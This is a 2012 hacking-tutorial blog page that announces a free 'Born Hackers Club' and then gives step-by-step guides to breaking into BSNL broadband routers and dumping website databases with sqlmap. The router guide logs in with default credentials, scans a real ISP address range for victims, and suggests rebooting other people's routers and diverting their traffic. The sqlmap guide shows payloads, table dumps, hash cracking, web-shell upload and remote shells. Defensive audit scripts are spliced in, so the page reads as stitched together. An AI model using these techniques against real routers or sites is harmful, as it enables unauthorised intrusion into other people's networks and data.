Tuesday, October 30, 2012
Want to become Hacker, I will make you expert

You want to become a hacker! I will make you one. Not actually "the one", but an expert one, and it's all free, because teaching should be free, as the holy books say. I can give you 100% assurance that if you are willing to become a hacker, I will make you the best one. I will teach you whatever I know, and whatever I don't know (I will learn it and then share it with you), because no one can be perfect but experts always exist. Most people have aspirations to become a hacker but don't know where to start, or what is good and what is bad. Being a hacker is bad as per the media, but when you go inside you will know the truth. I will help you explore the same. We are born hackers and have been hacking ever since birth, but we were never able to realize the hacker inside ourselves. You will now, because I will act as a catalyst.
Note: Catalyst, because everything is in you; I will just guide you.

Disclaimer: It's up to the individual which path he chooses. My motto is to provide knowledge and ethics, and I will not leave a single stone unturned.

Many users ask me the same question daily, again and again: "Sir, I want to become a hacker, please teach me." It was really embarrassing at first, but then I realized the positiveness and people's willingness to learn about cyber security and ethical hacking, and (most of you will not believe it) I decided that I will start my campaign again, as I don't want to hurt the feelings of learners. It was a great time when I first started the campaign under the name ISOFTDL Cybercops and then under Hackingloops under the CHECKMATE program. Because of personal reasons and a hectic schedule I had to turn down the programs, but now I have time for my friends, users and learners. I am starting my campaign again under Hackingloops under the program name "Born Hackers Club" (BHC).

Born Hackers Club:
Hackingloops is starting the Born Hackers Club group to teach people hacking and cyber security. This time I will start from the very basics, and we will spend more time on practicals than on theory, but the focus will always remain on concepts.

A few key features of the Born Hackers Club campaign:
1. Every week we learn two topics and have one practical session to test the skills we learnt.
2. I have created a website and a virtual environment (both Linux and Windows) where we can all practice hacking techniques.
3. I will share all my articles as easy-to-download PDF documents.
4. All practicals will be made available to all learners in the form of videos.
5. I will introduce an easy-to-contact feature, where you can ask any query live.
6. We will cover each and every tool of the Backtrack and Matriux operating systems, and all other hack tools, in our classes.
7. All hacking tool tutorials will be demonstrated with the help of video lectures.
8. We will teach both offensive and defensive hacking techniques.
9. We will conduct hacking exams online, both theoretical and practical (all exams will have prizes for the winners).
10. Most important: everything is free and open to all. So feel free to join and learn hacking with HackingLoops.

The inauguration of Born Hackers Club is planned for 1 Dec 2012. You will all receive updates regarding the hacking club on a regular basis.

Because when I said I will make you a hacker, my duty will end only when you become a hacker, i.e. when you become good enough that you can stand in front of 1000 people in a seminar and say: I can hack you now, because I am a hacker.

All ideas are heartily welcomed, and we will try our best to incorporate every idea suggested regarding the group, knowledge sharing, infrastructure or anything related.

Guys, I am starting this campaign to help you find the hacker hidden inside you, so be extrovert enough to be a part of this campaign.
I am also inviting all experts to be a part of this campaign, because knowledge only grows when you share it.

This is just an introduction to what I am up to and what I am going to start. So we are 31 days away from our start. Don't worry, we will not disappoint you during these 31 days: you will regularly get updates on Born Hackers Club and will continue to get the latest hacking articles apart from our campaign. So be a part of our family, the "Family of Hackers", because I want to hear that we are hackers, we are born hackers.

Regards,
Lokesh Singh (Lucky aka De$trUctive M!nd),
Owner of Hackingloops and Ccodechamp


Sunday, October 28, 2012
Hacking BSNL Broadband Routers Tutorial by Hackingloops

Hey friends, yesterday we learnt about hacking websites using SQLMAP and about Advanced Persistent Threats. Today we are going to learn how to break into BSNL ADSL routers. Hacking BSNL broadband routers is quite interesting, so Hackingloops has come up with this tutorial on how to hack BSNL broadband routers.

Note: This hack works on most of the newer ADSL, ADSL2+ and ADSL2+M routers.
In this article we are going to hack into the router to learn more about it. You might not know that this small and innocent-looking modem is actually a small Linux computer. Let's get into it. First do an nmap scan of the modem. Here is a quick example:
$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
The http port is open, and that is why we are able to access the administration page at http://192.168.1.1/.
But apart from http, the telnet port is also open, so why not try connecting to it?


$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>
 
Wow! We are able to log in to the telnet daemon of our router using the default username/password of admin/admin.
What next? Type in the help command and hit enter. It will list the supported commands, somewhat like this:


> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>

Some of these are the common terminal commands on Linux: ps, pwd, ping, cat etc. So let's see the current working directory using pwd.

> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available, so we have to use another trick to list the directories, and the trick is echo * (the shell expands the * glob to the names of the entries in the current directory, and echo prints them).

> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>
Cool! Those are the directories found on any Linux system like Ubuntu, Fedora etc.

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.

> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>
That's a Linux password file. Note two things a reviewer would flag straight away: every one of the four accounts has UID 0, so all of them are root-equivalent, and the password hashes sit directly in the world-readable passwd file (no shadow file) in the old 13-character DES crypt format, which limits passwords to 8 characters and is very fast to crack.
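To make those observations mechanical, here is an added audit script (example code written for this page, not something from the router or from Hackingloops) that parses passwd-format text and reports the findings a defender cares about: extra UID 0 accounts, hashes stored outside a shadow file, legacy DES crypt hashes, and placeholder accounts that still have an interactive shell. The sample input is the four lines shown above; the DES detection relies only on the classic 13-character crypt(3) alphabet, and the nologin shell list is an assumption about typical embedded builds.

```python
import re

# Sample input: the four /etc/passwd lines printed by the router above.
SAMPLE_PASSWD = """\
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
"""

# Traditional DES crypt(3) hashes are exactly 13 characters drawn from
# [./0-9A-Za-z]; modern modular-crypt hashes ($1$, $5$, $6$...) start with '$'.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")

# Shells that cannot be used interactively (assumed list for embedded systems).
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}


def parse_passwd(text):
    """Parse passwd-format text into one dict per account (7 colon-separated fields)."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pw_hash, uid, gid, gecos, home, shell = fields
        accounts.append({
            "name": name, "hash": pw_hash, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell,
        })
    return accounts


def audit_passwd(text, expected_root="root"):
    """Return (account, issue) findings worth raising in a security review."""
    findings = []
    for acct in parse_passwd(text):
        # Any UID 0 account other than the expected root account is root-equivalent.
        if acct["uid"] == 0 and acct["name"] != expected_root:
            findings.append((acct["name"], "uid 0: root-equivalent account"))
        # A real hash in passwd means no shadow file: anyone who can read it can crack it.
        if acct["hash"] not in ("", "x", "*", "!"):
            findings.append((acct["name"], "password hash stored in world-readable passwd (no shadow)"))
            if DES_CRYPT.match(acct["hash"]):
                findings.append((acct["name"], "legacy 13-char DES crypt hash (8-char limit, fast to crack)"))
        # Service placeholder accounts should not get an interactive shell.
        if acct["name"] == "nobody" and acct["shell"] not in NOLOGIN_SHELLS:
            findings.append((acct["name"], "service placeholder account has an interactive shell"))
    return findings


def root_equivalent_accounts(text):
    """Names of all UID 0 accounts in the file."""
    return [a["name"] for a in parse_passwd(text) if a["uid"] == 0]


if __name__ == "__main__":
    for name, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{name:8s} {issue}")
```

Run against the router's file this prints thirteen findings, one block per account; on a hardened device the same script should print nothing except, at most, the single expected root account.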

Linux version

The uname command is not available, so to get the Linux kernel version and other details use the following command:
> cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>
So that shows the Linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command:
> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

So now we get a BusyBox shell. Once again we can type the help command to see what is available:

# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#
This time we have a few additional commands available, like cd, mkdir, date, eval, exec etc., and even mount.
A list of all possible commands that BusyBox can have is available at http://www.busybox.net/downloads/BusyBox.html.


CPU/RAM Information

The details about the CPU and architecture can be found using the following command:
# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#


It's a MIPS-based 32-bit processor. You can compile C programs for this platform using a MIPS cross-compiler. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.


RAM information:
# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

 
So the device seems to have around 6 MB of built-in memory.
There are many other files in the /proc directory that can be viewed to gather more information about the system.

# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#
Try viewing other files and see what comes up.

Get Current username

The whoami command is not available, so the echo command has to be used to find the current username, home directory etc.
# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The /var directory is writable, and files have to be created using the echo command:
# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#

Remote files can be downloaded onto the router as well. The ftpget command is available for this. The exact syntax can be found at http://www.busybox.net/downloads/BusyBox.html.
Maybe you would like to write and compile a C program and then upload it to this router.

Hacking remote routers

You can discover remote routers with a simple nmap command like this:
$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/

This command just scans all the BSNL broadband IPs to see which are alive and have port 80 open. If the banner is micro_httpd then it is most likely a SemIndia router with a BusyBox shell. The "Embedded Allegro RomPager" hosts are Airtel Binatone and Beetel modems being used by BSNL broadband users.
One way to irritate other users is to restart the remote router by issuing the reboot command in the telnet terminal. But that would not be much fun.
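For an ISP or network owner auditing a range they are responsible for, the useful output of such a scan is an inventory of which devices expose a management interface to the internet. The script below is an added example (not from the page or from nmap) that parses nmap's grepable (-oG) "Host:" lines, splits each port entry into its port/state/protocol/service/version fields, and flags the banners the text above identifies as router configuration pages. The sample lines are constructed in the same shape as the scan output above but use RFC 5737 documentation addresses, and the banner signature list is an assumption built from the banners this article mentions.

```python
import re

# Constructed sample in nmap -oG format, modelled on the scan output above.
# Port entries are port/state/proto/owner/service/rpcinfo/version/ .
SAMPLE_GNMAP = """\
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 192.0.2.0/24
Host: 192.0.2.4 ()\tPorts: 80/open/tcp/////
Host: 192.0.2.12 ()\tPorts: 80/open/tcp//http//micro_httpd/
Host: 192.0.2.35 ()\tPorts: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 192.0.2.40 ()\tPorts: 80/open/tcp//skype2//Skype/
Host: 192.0.2.42 ()\tPorts: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 192.0.2.61 ()\tPorts: 80/open/tcp//tcpwrapped///\tIgnored State: closed (999)
Host: 192.0.2.227 ()\tPorts: 80/open/tcp//http//Apache httpd 2.2.19/
"""

# Assumed signature list: version banners that, per the article, belong to
# consumer ADSL router/modem configuration pages rather than real web sites.
MANAGEMENT_SIGNATURES = (
    ("micro_httpd", "micro_httpd (SemIndia-style ADSL router with BusyBox shell)"),
    ("RomPager", "Allegro RomPager embedded web server (Binatone/Beetel/ZyXEL modems)"),
    ("http config", "vendor device configuration page"),
)

HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)")
PORTS_RE = re.compile(r"Ports:\s*(?P<ports>.*?)(?:\t|$)")


def parse_port_entry(entry):
    """Split one 'port/state/proto/owner/service/rpcinfo/version/' entry."""
    f = entry.strip().split("/")
    if len(f) < 7:
        raise ValueError(f"unexpected port entry: {entry!r}")
    return {"port": int(f[0]), "state": f[1], "proto": f[2],
            "service": f[4], "version": f[6]}


def parse_gnmap(text):
    """Return one dict per 'Host:' line: ip, hostname and its port entries."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and the trailing summary are skipped
        pm = PORTS_RE.search(line)
        entries = pm.group("ports").split(",") if pm and pm.group("ports") else []
        hosts.append({"ip": m.group("ip"), "hostname": m.group("name"),
                      "ports": [parse_port_entry(e) for e in entries if e.strip()]})
    return hosts


def exposed_management(hosts):
    """(ip, port, label) for every open port whose banner matches a signature."""
    out = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] != "open":
                continue
            for needle, label in MANAGEMENT_SIGNATURES:
                if needle.lower() in p["version"].lower():
                    out.append((h["ip"], p["port"], label))
                    break
    return out


if __name__ == "__main__":
    for ip, port, label in exposed_management(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{ip:16s} tcp/{port}  {label}")
```

Each flagged address is a device whose remote administration should be switched off (see the conclusion of this article) or, if it must stay reachable, restricted to known source addresses and a non-default password.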

Hack into the LAN

The arp command can be used on the remote router to list its LAN nodes, i.e. all the computers in its internal network. It's quite simple:
> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>
The HW/MAC addresses have been hidden for privacy purposes. Now the router tells us who is inside the network.
Note that the arp command will not be available in the sh shell. It is only available in the telnet session.

Any of the internal nodes can be pinged:
> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>

From here on it might be possible to do some advanced hacking. The insmod command is available and can be used to load kernel modules.
Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. The iptables command is available and can be used to do this (it does not appear in either help listing above, so check whether your particular firmware ships it).

Conclusion

It would be a good idea to protect your own router from such hack attempts from the internet. This can be done by disabling remote logins to telnet, http etc. on the WAN side and by changing the default admin password, since the default admin/admin credentials are what let us in above. Log in to your configuration page at http://192.168.1.1 and find out how to do that.
This hacking technique is not only applicable to BSNL routers. Other ISPs like Airtel are also using similar routers, so it might be possible to try the same thing on them as well; you just need to scan the IP range.
The rest is your creativity. Research and find out what else can be done on such routers.
Advanced Persistant Threat Analysis with Network traffic Analysis

An Advanced Persistent Threat can be defined as a cyber attack that maintains a high degree of stealth over a prolonged period of operation. The attack objectives therefore typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and the initial goals reached.

Today's successful targeted attacks use a combination of social engineering, malware, and backdoor activities. Nart Villeneuve and James Bennett (Senior Threat Researchers) from Trend Micro provide a guide to detecting Advanced Persistent Threat (APT) activities with network traffic analysis, which can be used to identify malware command-and-control (C&C) communications related to these attacks, illustrating how even the most high-profile and successful attacks of the past few years could have been discovered.

The paper covers detecting Remote Access Trojans such as GhostNet, the Nitro attack, the RSA breach, the Taidoor campaign, the Sykipot campaign and more. Nart also talks about the challenges of network-based detection: two key factors, encryption and the cloud, make it harder. More than 90% of intrusions aren't even discovered by the victims themselves, but through third-party notification.

In many cases, the APT has been on the victim network for months or even years, exfiltrating intellectual property data plus economic and political information. "The ability to detect APT activity at the network level is heavily dependent on leveraging threat intelligence. A variety of very successful ongoing campaigns can be detected at the network level because their communications remain consistent over time." 

To get rid of such attacks you must know what that information is, where it resides, who has access to it, why they have access and when they access it. Answering these types of questions should give you a clearer picture of which are the most critical pieces of your infrastructure that need your attention. Modifications made to malware's network communications can, however, disrupt the ability to detect them.

As such, the ongoing development of threat intelligence based on increased visibility and information sharing is critical to developing indicators used to detect such activity at the network level. For advanced detection techniques based on protocol-aware detection, HTTP headers, compressed archives, timing and size, you can read the complete paper, available here:

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf

Source : The Hacker News

Hacking Websites using SQLMAP | HackingLoops Tutorials

Hey friends, Hackingloops is back with another tutorial on hacking websites. Today we will learn how to hack websites using SQLMAP. Hacking websites using SQLMAP is quite easy, if you know how to use SQLMAP. sqlmap is one of the most popular and powerful SQL injection automation tools out there. Get it from http://sqlmap.org/. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.
For the list of options and parameters that can be used with the sqlmap command, check the following URL:
https://github.com/sqlmapproject/sqlmap/wiki/Usage

To understand this tutorial you should have a thorough understanding of how database-driven web applications work, for example those made with PHP+MySQL.

URLs

Let's say you have a URL like this:
http://www.site.com/section.php?id=51
and that it is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the URL
http://www.site.com/section.php?id=51'
We just added a single quote to the parameter. If this URL throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote.
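The single-quote test works because the request parameter is being pasted into the SQL text. The following added example (written for this page; it is not code from the tutorial or from sqlmap) reproduces that mistake and its fix side by side against an in-memory SQLite table standing in for the site's MySQL database: `lookup_vulnerable` concatenates the raw `id` value into the query, so `51'` produces the database error the text describes and `51 OR 1=1` returns every row, while `lookup_safe` passes the value as a bound parameter, so the database never parses it as SQL. The table and rows are constructed sample data.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO sections VALUES (?, ?, ?)", [
        (50, "Public page", 1),
        (51, "Another public page", 1),
        (99, "Draft, not published", 0),
    ])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The mistake the tutorial describes: the request parameter becomes SQL text.
    A quote breaks the statement; 'OR 1=1' rewrites its logic."""
    sql = "SELECT id, title FROM sections WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Bound parameter: the value is sent separately from the statement, so a quote
    or an OR clause is just data that matches no row."""
    return conn.execute("SELECT id, title FROM sections WHERE id = ?", (raw_id,)).fetchall()


def probe_both(raw_id):
    """Run one request value through both lookups. A database error from the
    vulnerable lookup is exactly the symptom the single-quote test looks for."""
    conn = make_db()
    try:
        vulnerable = lookup_vulnerable(conn, raw_id)
    except sqlite3.OperationalError:
        vulnerable = "SQL error"
    return {"vulnerable": vulnerable, "safe": lookup_safe(conn, raw_id)}


if __name__ == "__main__":
    for value in ("51", "51'", "51 OR 1=1"):
        print(f"id={value!r}: {probe_both(value)}")
```

The same contrast holds for PHP+MySQL: a PDO prepared statement with a bound `:id` placeholder behaves like `lookup_safe`, whereas string interpolation into `mysql_query()` behaves like `lookup_vulnerable`. Note that `lookup_safe` still returns the row for the plain value `51`, so the fix costs nothing in functionality.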

Hacking with sqlmap

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the Python interpreter:
python sqlmap.py -u "http://www.site.com/section.php?id=51"
The above is the first and most simple command to run with the sqlmap tool. It will check the URL and try to discover basic information about the system. The output can look something like this:
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But it's time to move on and see what more this tool is capable of.
 
Discover Databases
In this step sqlmap is used to find out what databases exist on the target system. Again the command is very simple:
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs
The output could be something like this:
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
This time the output contains the list of available databases. Moving on...


Find tables in the database
Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.
Command:
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this:
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
...........
Isn't this amazing? It is, of course. Let's get the columns of a particular table now.


Get columns of a table
Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
The output can be something like this:
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
[12:17:49] [INFO] retrieved: permission
[12:17:51] [INFO] retrieved: tinyint(4)
[12:17:52] [INFO] retrieved: email
[12:17:53] [INFO] retrieved: text
[12:17:54] [INFO] retrieved: system_home
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+


So now the columns are clearly visible. Good job!

Get data of the table
Now comes the most interesting part: extracting the data from the table. The command would be
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.

The output might look similar to this


+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you would get the login details right away. sqlmap will create a CSV file containing the dumped data for easy analysis.

What Next?

Execute arbitrary SQL commands on the server
This is probably the easiest thing to do on a server that is vulnerable to SQL injection. The --sql-query parameter can be used to specify a SQL query to execute. Things of interest would be to create a user in the users table or something similar, or maybe change/modify the content of CMS pages etc.
Another parameter, --sql-shell, gives an SQL-shell-like interface to run queries interactively.

Get inside the admin panel and play
If the website is running some kind of custom CMS or something similar that has an admin panel, then it might be possible to get inside, provided you are able to crack the password retrieved from the database dump. Simple, short passwords can be broken simply by brute-forcing; however, long, complex passwords may not be breakable.
Check if the admin panel allows uploading files. If an arbitrary PHP file can be uploaded then it will be a lot more fun. The PHP file can contain shell_exec, system, exec or passthru function calls, and that will allow executing arbitrary system commands. PHP web shell scripts can be uploaded to do the same thing.

Shell on remote OS
This is the thing to do to completely take over the server. However, note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter called --os-shell that can be used to try to get a shell on the remote system, but it has many limitations of its own.
According to the sqlmap manual:
It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.
The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will not work in most cases.

Note

1. Sometimes sqlmap is unable to connect to the URL at all. This is visible when it gets stuck at the first task of "testing connection to the target url". In such cases it's helpful to use the "--random-agent" option. This makes sqlmap use a valid user agent signature like the ones sent by a browser such as Chrome or Firefox, instead of its own default user agent, which names the tool.
2. For URLs that are not in the form param=value, sqlmap cannot automatically know where to inject. For example, MVC URLs like

